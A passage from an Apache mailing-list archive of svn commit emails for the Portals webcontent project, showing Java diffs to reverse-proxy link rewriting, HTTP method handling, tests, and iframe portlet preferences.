DefaultKeyValue(createRemoteURLMatchingPattern(proxyMapper), + createLocalPathMatchingReplaces(proxyMapper)); + + Matcher matcher = ((Pattern) pair.getKey()).matcher(tempLine); + tempLine = replaceRemoteLinkValues(matcher, "$1$2=$3" + ((String) pair.getValue()) + "$6$3", tempLine); + + remoteURLPatternReplacesPairs.add(pair); + proxyPathMappers.add(proxyMapper); + } + } + + segment = segment.subSequence(absURLMatcher.end(), segment.length()); + absURLMatcher.reset(segment); } } else { KeyValue pair = getMyURLPatternReplacesPair(); - Matcher otherLinkBasePathMatcher = ((Pattern) pair.getKey()).matcher(tempLine); - tempLine = otherLinkBasePathMatcher.replaceAll(" $1=$2" + ((String) pair.getValue()) + "$5$2"); + Matcher matcher = ((Pattern) pair.getKey()).matcher(tempLine); + tempLine = matcher.replaceAll("$1$2=$3" + ((String) pair.getValue()) + "$6$3"); } line = tempLine; @@ -136,7 +206,7 @@ log.info("replaced: {}", StringUtils.replaceEach(StringUtils.removeEnd(proxyMapper.getRemoteBaseURL(), "/"), linkRemoteBaseURLSearches, linkRemoteBaseURLReplaces)); remoteBaseURLPattern = StringUtils.replaceEach(StringUtils.removeEnd(proxyMapper.getRemoteBaseURL(), "/"), linkRemoteBaseURLSearches, linkRemoteBaseURLReplaces); - pattern = Pattern.compile("\\s(href|src|action)\\s*=\\s*(['\"])((" + remoteBaseURLPattern + ")([^'\"]+))['\"]", Pattern.CASE_INSENSITIVE); + pattern = Pattern.compile("(\\s|^)(href|src|action)\\s*=\\s*(['\"])((" + remoteBaseURLPattern + ")([^'\"]*))['\"]", Pattern.CASE_INSENSITIVE); return pattern; } @@ -146,22 +216,19 @@ return reverseProxyRewritingContext.getRewritingContextPath() + StringUtils.removeEnd(proxyMapper.getLocalBasePath(), "/"); } - protected KeyValue [] getRemoteURLPatternReplacesPairs() + protected List<KeyValue> getRemoteURLPatternReplacesPairs() { if (remoteURLPatternReplacesPairs == null) { HttpReverseProxyPathMapperProvider mapperProvider = reverseProxyRewritingContext.getHttpReverseProxyPathMapperProvider(); - List<HttpReverseProxyPathMapper> proxyMappers = mapperProvider.getProxyPathMappers(); - int proxyMappersCount = proxyMappers.size(); - remoteURLPatternReplacesPairs = new KeyValue[proxyMappersCount]; + proxyPathMappers = new ArrayList<HttpReverseProxyPathMapper>(mapperProvider.getProxyPathMappers()); + int proxyMappersCount = proxyPathMappers.size(); + remoteURLPatternReplacesPairs = new ArrayList<KeyValue>(); - int index = 0; - for (HttpReverseProxyPathMapper proxyMapper : proxyMappers) + for (HttpReverseProxyPathMapper proxyMapper : proxyPathMappers) { - remoteURLPatternReplacesPairs[index] = - new DefaultKeyValue(createRemoteURLMatchingPattern(proxyMapper), - createLocalPathMatchingReplaces(proxyMapper)); - ++index; + remoteURLPatternReplacesPairs.add(new DefaultKeyValue(createRemoteURLMatchingPattern(proxyMapper), + createLocalPathMatchingReplaces(proxyMapper))); } } @@ -179,6 +246,42 @@ return myURLPatternReplacesPair; } + protected String replaceRemoteLinkValues(Matcher matcher, String replacement, String text) + { + matcher.reset(); + boolean result = matcher.find(); + + if (result) + { + StringBuffer sb = new StringBuffer(); + + do + { + // if the url is comopsed of scheme and domain name such as "http://projects.apache.org", + // then the local path info should be appended by '/' like "/webcontent/rproxy/project_apache/". + + if (HTTP_DOMAIN_ADDRESS_ONLY_PATTERN.matcher(matcher.group(4)).matches()) + { + int offset = replacement.lastIndexOf("$3"); + matcher.appendReplacement(sb, replacement.substring(0, offset) + "/" + replacement.substring(offset)); + } + else + { + matcher.appendReplacement(sb, replacement); + } + + result = matcher.find(); + } + while (result); + + matcher.appendTail(sb); + + return sb.toString(); + } + + return text; + } + public void parse(Rewriter rewriter, Reader reader) throws RewriterException { throw new UnsupportedOperationException(); Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java?rev=821006&r1=821005&r2=821006&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java Fri Oct 2 13:09:00 2009 @@ -44,9 +44,14 @@ import org.apache.http.auth.Credentials; import org.apache.http.auth.UsernamePasswordCredentials; import org.apache.http.client.entity.UrlEncodedFormEntity; +import org.apache.http.client.methods.HttpDelete; import org.apache.http.client.methods.HttpGet; +import org.apache.http.client.methods.HttpHead; +import org.apache.http.client.methods.HttpOptions; import org.apache.http.client.methods.HttpPost; +import org.apache.http.client.methods.HttpPut; import org.apache.http.client.methods.HttpRequestBase; +import org.apache.http.client.methods.HttpTrace; import org.apache.http.client.params.ClientPNames; import org.apache.http.conn.ClientConnectionManager; import org.apache.http.conn.scheme.PlainSocketFactory; @@ -173,16 +178,21 @@ // proxyPathMapper can be injected by using request attribute. HttpReverseProxyPathMapper proxyPathMapper = (HttpReverseProxyPathMapper) request.getAttribute(HttpReverseProxyConstants.PATH_MAPPER); - String pathInfo = request.getPathInfo(); + String localPathInfo = request.getPathInfo(); + + if (localPathInfo.indexOf('/', 1) == -1) + { + localPathInfo = localPathInfo + "/"; + } if (proxyPathMapper == null) { - proxyPathMapper = proxyPathMapperProvider.findMapper(request); + proxyPathMapper = proxyPathMapperProvider.findMapper(localPathInfo); } if (proxyPathMapper == null) { - throw new IOException("Proxy configuration is not defined for " + pathInfo); + throw new IOException("Proxy configuration is not defined for " + localPathInfo); } if (hostHeaderValue == null) @@ -197,11 +207,11 @@ } } - String proxyTargetURL = proxyPathMapper.getRemoteURL(pathInfo); + String proxyTargetURL = proxyPathMapper.getRemoteURL(localPathInfo); if (proxyTargetURL == null) { - throw new IllegalStateException("Cannot translate the location path info into remote URL. " + pathInfo); + throw new IllegalStateException("Cannot translate the location path info into remote URL. " + localPathInfo); } String queryString = request.getQueryString(); @@ -216,15 +226,19 @@ // redirection should be adjusted with local host header... httpClient.getParams().setBooleanParameter(ClientPNames.HANDLE_REDIRECTS, false); - String method = request.getMethod(); - HttpRequestBase httpRequest = null; - if ("GET".equals(method)) + String method = request.getMethod(); + + if (HttpGet.METHOD_NAME.equals(method)) { httpRequest = new HttpGet(proxyTargetURL); } - else if ("POST".equals(method)) + else if (HttpHead.METHOD_NAME.equals(method)) + { + httpRequest = new HttpHead(proxyTargetURL); + } + else if (HttpPost.METHOD_NAME.equals(method)) { httpRequest = new HttpPost(proxyTargetURL); long contentLength = NumberUtils.toLong(request.getHeader(HTTP.CONTENT_LEN)); @@ -235,6 +249,30 @@ ((HttpPost) httpRequest).setEntity(entity); } } + else if (HttpPut.METHOD_NAME.equals(method)) + { + httpRequest = new HttpPut(proxyTargetURL); + + long contentLength = NumberUtils.toLong(request.getHeader(HTTP.CONTENT_LEN)); + + if (contentLength > 0L) + { + HttpEntity entity = new InputStreamEntity(request.getInputStream(), contentLength); + ((HttpPost) httpRequest).setEntity(entity); + } + } + else if (HttpDelete.METHOD_NAME.equals(method)) + { + httpRequest = new HttpDelete(proxyTargetURL); + } + else if (HttpOptions.METHOD_NAME.equals(method)) + { + httpRequest = new HttpOptions(proxyTargetURL); + } + else if (HttpTrace.METHOD_NAME.equals(method)) + { + httpRequest = new HttpHead(proxyTargetURL); + } else { throw new IOException("Unsupported method: " + method); @@ -276,14 +314,6 @@ if (StringUtils.equalsIgnoreCase(headerName, HTTP.TARGET_HOST)) continue; - // TODO: Is there any better way to handle "Range" and "If-Range" headers without ignoring like these? - - if (StringUtils.equalsIgnoreCase(headerName, HttpReverseProxyConstants.HTTP_HEADER_RANGE)) - continue; - - if (StringUtils.equalsIgnoreCase(headerName, HttpReverseProxyConstants.HTTP_HEADER_IF_RANGE)) - continue; - for (Enumeration enumHeaderValues = request.getHeaders(headerName); enumHeaderValues.hasMoreElements(); ) { String headerValue = (String) enumHeaderValues.nextElement(); @@ -402,7 +432,7 @@ } // Send the content to the client - writeHttpEntityToClient(request, response, httpEntity, proxyPathMapper, rewriterContextPath); + writeHttpEntityToClient(request, response, httpEntity, proxyPathMapper, rewriterContextPath, localPathInfo); } } } @@ -433,7 +463,9 @@ private void writeHttpEntityToClient(HttpServletRequest request, HttpServletResponse response, HttpEntity httpEntity, - HttpReverseProxyPathMapper proxyPathMapper, String rewriterContextPath) throws IOException + HttpReverseProxyPathMapper proxyPathMapper, + String rewriterContextPath, + String localPathInfo) throws IOException { InputStream in = null; Reader reader = null; @@ -550,7 +582,7 @@ writer = new OutputStreamWriter(gzipEncoded ? new GZIPOutputStream(out) : out); } - rewriter.setBaseUrl(rewriterContextPath + request.getPathInfo()); + rewriter.setBaseUrl(rewriterContextPath + localPathInfo); rewriter.rewrite(parserAdaptor, reader, writer); writer.flush(); } Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/SimpleLinkRewritingParserAaptor.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/SimpleLinkRewritingParserAaptor.java?rev=821006&r1=821005&r2=821006&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/SimpleLinkRewritingParserAaptor.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/SimpleLinkRewritingParserAaptor.java Fri Oct 2 13:09:00 2009 @@ -27,6 +27,7 @@ { public SimpleLinkRewritingParserAaptor() { - super(false); + super(); + setLookUpAllMappings(true); } } Added: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/CharArraySegment.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/CharArraySegment.java?rev=821006&view=auto ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/CharArraySegment.java (added) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/CharArraySegment.java Fri Oct 2 13:09:00 2009 @@ -0,0 +1,93 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.portals.applications.webcontent.util; + +import javax.swing.text.Segment; + +/** + * CharArraySegment + * <P> + * Implements {@link CharSequence} interface by leveraging {@link Segment} class. + * </P> + * <P> + * <EM> + * Note: Since Java 1.6, {@link Segment} implements {@link CharSequence} interface. + * </EM> + * </P> + * + * @version $Id$ + */ +public class CharArraySegment extends Segment implements CharSequence +{ + + public CharArraySegment() + { + super(); + } + + public CharArraySegment(char[] array, int offset, int count) + { + super(array, offset, count); + } + + public CharArraySegment(String s) + { + super(s.toCharArray(), 0, s.length()); + } + + public char charAt(int index) + { + if (index < 0 || index >= count) + { + throw new IllegalArgumentException("Invalid index: " + index); + } + + return array[offset + index]; + } + + public int length() + { + return count; + } + + public CharSequence subSequence(int start, int end) + { + if (start < 0) + { + throw new IllegalArgumentException("Invalid start index: " + start); + } + + if (end > count) + { + throw new IllegalArgumentException("Invalid end index: " + end); + } + + if (start > end) + { + throw new IllegalArgumentException("Invalid start and end index: " + start + " > " + end); + } + + CharArraySegment charArraySegment = new CharArraySegment(); + + charArraySegment.array = array; + charArraySegment.offset = offset + start; + charArraySegment.count = end - start; + + return charArraySegment; + } + +} Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/CharArraySegment.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/CharArraySegment.java ------------------------------------------------------------------------------ svn:keywords = Id Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/util/CharArraySegment.java ------------------------------------------------------------------------------ svn:mime-type = text/plain Modified: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java?rev=821006&r1=821005&r2=821006&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java Fri Oct 2 13:09:00 2009 @@ -21,15 +21,12 @@ import java.util.List; import java.util.Map; -import javax.servlet.http.HttpServletRequest; - import junit.framework.TestCase; import org.apache.portals.applications.webcontent.proxy.impl.DefaultHttpReverseProxyPathMapperImpl; import org.apache.portals.applications.webcontent.proxy.impl.DefaultHttpReverseProxyPathMapperProviderImpl; import org.apache.portals.applications.webcontent.rewriter.RewriterController; import org.apache.portals.applications.webcontent.rewriter.rules.Ruleset; -import org.easymock.EasyMock; /** * TestProxyPassMappings @@ -54,33 +51,20 @@ public void testProxyPathMappings() throws Exception { HttpReverseProxyPathMapper mapper = null; - HttpServletRequest request = EasyMock.createNiceMock(HttpServletRequest.class); - - EasyMock.reset(request); - EasyMock.expect(request.getPathInfo()).andReturn("/localhost/index.html"); - EasyMock.replay(request); - mapper = pathMapperProvider.findMapper(request); + mapper = pathMapperProvider.findMapper("/localhost/index.html"); assertEquals("localhost", mapper.getName()); mapper = pathMapperProvider.findMapperByRemoteURL("http://www.localhost.com/index.html"); assertEquals("localhost", mapper.getName()); - EasyMock.reset(request); - EasyMock.expect(request.getPathInfo()).andReturn("/www_apache/index.html"); - EasyMock.replay(request); - - mapper = pathMapperProvider.findMapper(request); + mapper = pathMapperProvider.findMapper("/www_apache/index.html"); assertEquals("apache:/www_apache/", mapper.getName()); mapper = pathMapperProvider.findMapperByRemoteURL("http://www.apache.org/index.html"); assertEquals("apache:/www_apache/", mapper.getName()); assertEquals("http://www.apache.org/index.html", mapper.getRemoteURL("/www_apache/index.html")); assertEquals("/www_apache/index.html", mapper.getLocalPath("http://www.apache.org/index.html")); - EasyMock.reset(request); - EasyMock.expect(request.getPathInfo()).andReturn("/portals_apache/index.html"); - EasyMock.replay(request); - - mapper = pathMapperProvider.findMapper(request); + mapper = pathMapperProvider.findMapper("/portals_apache/index.html"); assertEquals("apache:/portals_apache/", mapper.getName()); mapper = pathMapperProvider.findMapperByRemoteURL("http://portals.apache.org/index.html"); assertEquals("apache:/portals_apache/", mapper.getName()); Modified: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java?rev=821006&r1=821005&r2=821006&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java Fri Oct 2 13:09:00 2009 @@ -23,8 +23,6 @@ import java.util.List; import java.util.Map; -import javax.servlet.http.HttpServletRequest; - import junit.framework.TestCase; import org.apache.commons.io.IOUtils; @@ -35,7 +33,6 @@ import org.apache.portals.applications.webcontent.proxy.impl.PassMappingLinkRewritingParserAaptor; import org.apache.portals.applications.webcontent.rewriter.RewriterController; import org.apache.portals.applications.webcontent.rewriter.rules.Ruleset; -import org.easymock.EasyMock; import org.slf4j.Logger; import org.slf4j.LoggerFactory; @@ -53,9 +50,13 @@ "<html>\n" + "<p><a href=\"mission.html\">Mission</a> and <a href='about.html'>About</a></p>\n" + "<p><a href=\"/docs/\">Docs</a> and <a href='/documents/'>Documents</a></p>\n" + - "<p><a href=\"http://portals.apache.org/projectinfo.html\">Project Info.</a></p>\n" + + "<p><a href=\"http://projects.apache.org\" title=\"Apache Projects\">Projects</a> <a href=\"http://portals.apache.org/apa.html\">Applications</a></p>\n" + "<p><a href=\"http://www.apache.org/events.html\">Events</a> <a href='http://www.apache.org/apachecon.html'>Apache Con</a></p>\n" + "<p><a href=\"http://www.localhost.com/manager/list\">Application Management</a> <a href='http://www.localhost.com/manager/start'>Start Application</a></p>\n" + + "<p><a \n" + + "href=\"/docs/\">Docs</a> and <a href='/documents/'>Documents</a></p>\n" + + "<p><a \n" + + "href=\"http://www.localhost.com/manager/list\">Application Management</a></p>\n" + "</html>"; private HttpReverseProxyPathMapperProvider proxyPathMapperProvider; @@ -79,19 +80,8 @@ public void testPathMappingRewriting() throws Exception { - HttpServletRequest request = EasyMock.createNiceMock(HttpServletRequest.class); - - EasyMock.reset(request); - EasyMock.expect(request.getPathInfo()).andReturn("/portals_apache/index.html"); - EasyMock.replay(request); - proxyPathMapperProvider.findMapper(request); - - EasyMock.reset(request); - EasyMock.expect(request.getPathInfo()).andReturn("/www_apache/index.html"); - EasyMock.replay(request); - ReverseProxyRewritingContext rewritingContext = - new DefaultReverseProxyRewritingContext(proxyPathMapperProvider.findMapper(request), + new DefaultReverseProxyRewritingContext(proxyPathMapperProvider.findMapper("/www_apache/index.html"), proxyPathMapperProvider, "/webcontent/rproxy"); @@ -111,11 +101,14 @@ assertTrue("Wrong rewriting: " + lines.get(1), StringUtils.contains(lines.get(1), "href='about.html'")); assertTrue("Wrong rewriting: " + lines.get(2), StringUtils.contains(lines.get(2), "href=\"/webcontent/rproxy/www_apache/docs/\"")); assertTrue("Wrong rewriting: " + lines.get(2), StringUtils.contains(lines.get(2), "href='/webcontent/rproxy/www_apache/documents/'")); - assertTrue("Wrong rewriting: " + lines.get(3), StringUtils.contains(lines.get(3), "href=\"/webcontent/rproxy/portals_apache/projectinfo.html\"")); + assertTrue("Wrong rewriting: " + lines.get(3), StringUtils.contains(lines.get(3), "href=\"/webcontent/rproxy/projects_apache/\"")); + assertTrue("Wrong rewriting: " + lines.get(3), StringUtils.contains(lines.get(3), "href=\"/webcontent/rproxy/portals_apache/apa.html\"")); assertTrue("Wrong rewriting: " + lines.get(4), StringUtils.contains(lines.get(4), "href=\"/webcontent/rproxy/www_apache/events.html\"")); assertTrue("Wrong rewriting: " + lines.get(4), StringUtils.contains(lines.get(4), "href='/webcontent/rproxy/www_apache/apachecon.html'")); assertTrue("Wrong rewriting: " + lines.get(5), StringUtils.contains(lines.get(5), "href=\"/webcontent/rproxy/localhost/manager/list\"")); assertTrue("Wrong rewriting: " + lines.get(5), StringUtils.contains(lines.get(5), "href='/webcontent/rproxy/localhost/manager/start'")); + assertTrue("Wrong rewriting: " + lines.get(7), StringUtils.contains(lines.get(7), "href=\"/webcontent/rproxy/www_apache/docs/\"")); + assertTrue("Wrong rewriting: " + lines.get(9), StringUtils.contains(lines.get(9), "href=\"/webcontent/rproxy/localhost/manager/list\"")); } } From [email protected] Fri Oct 02 14:55:40 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60960 invoked from network); 2 Oct 2009 14:55:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Oct 2009 14:55:40 -0000 Received: (qmail 70610 invoked by uid 500); 2 Oct 2009 14:55:40 -0000 Delivered-To: [email protected] Received: (qmail 70586 invoked by uid 500); 2 Oct 2009 14:55:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70576 invoked by uid 99); 2 Oct 2009 14:55:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Oct 2009 14:55:40 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Oct 2009 14:55:36 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 3BE9E238889D; Fri, 2 Oct 2009 14:55:15 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r821041 - in /portals/applications/webcontent/trunk: webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java webcontent-war/src/main/webapp/WEB-INF/portlet.xml Date: Fri, 02 Oct 2009 14:55:15 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: woonsan Date: Fri Oct 2 14:55:14 2009 New Revision: 821041 URL: http://svn.apache.org/viewvc?rev=821041&view=rev Log: APA-17: Enables to set editable preferences (as ordered) by 'EDITABLEPREFS' preference value. Also, enables to customize title by "TITLE" preference. Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/portlet.xml Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java?rev=821041&r1=821040&r2=821041&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java Fri Oct 2 14:55:14 2009 @@ -18,7 +18,9 @@ import java.io.IOException; import java.io.StringWriter; +import java.util.ArrayList; import java.util.HashMap; +import java.util.List; import java.util.Map; import javax.portlet.ActionRequest; @@ -35,6 +37,7 @@ import javax.portlet.ResourceURL; import javax.portlet.WindowState; +import org.apache.commons.collections.keyvalue.DefaultMapEntry; import org.apache.commons.lang.BooleanUtils; import org.apache.commons.lang.ClassUtils; import org.apache.commons.lang.StringUtils; @@ -62,14 +65,13 @@ private Map<String, String> maxAttributes = new HashMap<String, String>(); private boolean isPortlet10Container; - + @Override public void init(PortletConfig config) throws PortletException { super.init(config); attributes.put("TITLE", ""); - attributes.put("EDITABLEPREFS", ""); attributes.put("SRC", "http://www.apache.org"); attributes.put("PROXYREMOTEURL", ""); attributes.put("PROXYLOCALPATH", ""); @@ -170,6 +172,7 @@ @Override public void doView(RenderRequest request, RenderResponse response) throws PortletException, IOException { + setTitleByPreferences(request, response); String viewPage = (String) request.getAttribute(PARAM_VIEW_PAGE); if (viewPage != null) @@ -186,6 +189,7 @@ public void setupPreferencesEdit(RenderRequest request, RenderResponse response) { PortletPreferences prefs = request.getPreferences(); + String editablePrefNames = getAttributePreference(prefs, "EDITABLEPREFS"); if (StringUtils.isBlank(editablePrefNames)) @@ -194,16 +198,20 @@ } else { + List<DefaultMapEntry> prefEntryList = new ArrayList<DefaultMapEntry>(); Map<String, String> prefsMap = new HashMap<String, String>(); String [] prefNames = StringUtils.split(editablePrefNames, ","); + String [] emptyValues = {}; for (String prefName : prefNames) { prefName = prefName.trim(); - prefsMap.put(prefName, prefs.getValue(prefName, "")); + String [] prefValues = prefs.getValues(prefName, emptyValues); + prefsMap.put(prefName, prefValues.length == 0 ? "" : prefValues[0]); + prefEntryList.add(new DefaultMapEntry(prefName, prefValues)); } - getContext(request, response).put("prefs", prefsMap.entrySet().iterator()); + getContext(request, response).put("prefs", prefEntryList.iterator()); getContext(request, response).put("prefsMap", prefsMap); } } @@ -211,11 +219,26 @@ @Override public void doEdit(RenderRequest request, RenderResponse response) throws PortletException, IOException { + setTitleByPreferences(request, response); response.setContentType("text/html"); doPreferencesEdit(request, response); } @Override + public void doHelp(RenderRequest request, RenderResponse response) throws PortletException, IOException + { + setTitleByPreferences(request, response); + super.doHelp(request, response); + } + + @Override + public void doCustom(RenderRequest request, RenderResponse response) throws PortletException, IOException + { + setTitleByPreferences(request, response); + super.doCustom(request, response); + } + + @Override public void serveResource(ResourceRequest request, ResourceResponse response) throws PortletException, IOException { String resourceId = request.getResourceID(); @@ -329,13 +352,6 @@ } } - String title = getAttributePreference(prefs, "TITLE"); - - if (!StringUtils.isEmpty(title)) - { - response.setTitle(title); - } - // set required content type and write HTML IFRAME content response.setContentType("text/html"); response.getWriter().print(content.toString()); @@ -388,5 +404,15 @@ processPreferencesAction(request, actionResponse); } } + + protected void setTitleByPreferences(RenderRequest request, RenderResponse response) + { + String title = getAttributePreference(request.getPreferences(), "TITLE"); + + if (!StringUtils.isEmpty(title)) + { + response.setTitle(title); + } + } } Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/portlet.xml URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/portlet.xml?rev=821041&r1=821040&r2=821041&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/portlet.xml (original) +++ portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/portlet.xml Fri Oct 2 14:55:14 2009 @@ -54,6 +54,14 @@ </portlet-info> <portlet-preferences> <preference> + <name>EDITABLEPREFS</name> + <value>TITLE, SRC, WIDTH, HEIGHT, MAX-WIDTH, MAX-HEIGHT, SCROLLING, AUTORESIZE, VISITLASTPAGE</value> + </preference> + <preference> + <name>TITLE</name> + <value></value> + </preference> + <preference> <name>SRC</name> <value>http://portals.apache.org/</value> </preference> @@ -130,6 +138,14 @@ </portlet-info> <portlet-preferences> <preference> + <name>EDITABLEPREFS</name> + <value>TITLE, SRC, PROXYREMOTEURL, PROXYLOCALPATH, WIDTH, HEIGHT, MAX-WIDTH, MAX-HEIGHT, SCROLLING, AUTORESIZE, VISITLASTPAGE</value> + </preference> + <preference> + <name>TITLE</name> + <value></value> + </preference> + <preference> <name>SRC</name> <value>http://portals.apache.org/</value> </preference> From [email protected] Fri Oct 02 16:00:27 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81419 invoked from network); 2 Oct 2009 16:00:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Oct 2009 16:00:27 -0000 Received: (qmail 4696 invoked by uid 500); 2 Oct 2009 16:00:27 -0000 Delivered-To: [email protected] Received: (qmail 4673 invoked by uid 500); 2 Oct 2009 16:00:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4640 invoked by uid 99); 2 Oct 2009 16:00:26 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Oct 2009 16:00:26 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Oct 2009 16:00:16 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id D9888238888D; Fri, 2 Oct 2009 15:59:54 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r821069 - in /portals/applications/webcontent/trunk: webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/ webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/ webcontent-war/src/mai... Date: Fri, 02 Oct 2009 15:59:54 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: woonsan Date: Fri Oct 2 15:59:54 2009 New Revision: 821069 URL: http://svn.apache.org/viewvc?rev=821069&view=rev Log: APA-17: Cleaning reverseproxy.properties and changes on setting iframe portlet's title by overriding getTitle() of GenericPortlet. Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties Modified: 